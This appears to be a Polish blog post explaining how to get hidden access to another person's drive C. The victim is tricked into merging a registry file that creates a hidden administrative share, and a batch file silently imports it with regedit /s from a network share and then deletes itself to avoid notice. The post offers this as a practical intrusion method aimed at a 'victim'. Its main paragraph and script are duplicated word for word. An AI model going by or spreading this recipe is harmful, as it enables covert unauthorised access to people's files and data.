Wzór pliku in.reg można bardzo łatwo uzyskać eksportując z rejestru zapis dowolnego udostępnienia. Później wystarczy odpowiednio go zmodyfikować (zmienić nazwę udziału, ścieżkę dostępu itd.)
Kiedy użytkownik na innym komputerze uruchomi ten plik (domyślnie - scalaj) wówczas informacje zostaną wprowadzone do rejestru systemowego. Po ponownym starcie systemu na komputerze ofiary będziemy mieli swobodny dostęp do jego dysku C (znaczek '$' przy nazwie udostępnienia oznacza, że udział nie będzie widoczny w Otoczeniu Sieciowym). Jak już wspomniałem metoda ta jest bardzo prymitywna choćby ze względu na komunikat, który pojawi się na ekranie komputera informujący o wprowadzeniu zmiennych do rejestru. Dlatego powinniśmy zadbać o to aby program regedit.exe był uruchamiany z parametrem /s - to zapewni nam dyskrecje. Można to zrobić wykorzystując plik bat :
-----start.bat-----
regedit.exe /s \\MAX\TAJNY$\in.reg
del start.bat
----- - - -----
Kiedy użytkownik na innym komputerze uruchomi ten plik (domyślnie - scalaj) wówczas informacje zostaną wprowadzone do rejestru systemowego. Po ponownym starcie systemu na komputerze ofiary będziemy mieli swobodny dostęp do jego dysku C (znaczek '$' przy nazwie udostępnienia oznacza, że udział nie będzie widoczny w Otoczeniu Sieciowym). Jak już wspomniałem metoda ta jest bardzo prymitywna choćby ze względu na komunikat, który pojawi się na ekranie komputera informujący o wprowadzeniu zmiennych do rejestru. Dlatego powinniśmy zadbać o to aby program regedit.exe był uruchamiany z parametrem /s - to zapewni nam dyskrecje. Można to zrobić wykorzystując plik bat :
-----start.bat-----
regedit.exe /s \\MAX\TAJNY$\in.reg
del start.bat
----- - - -----
posted by rufus at 11:43 PM
<< Home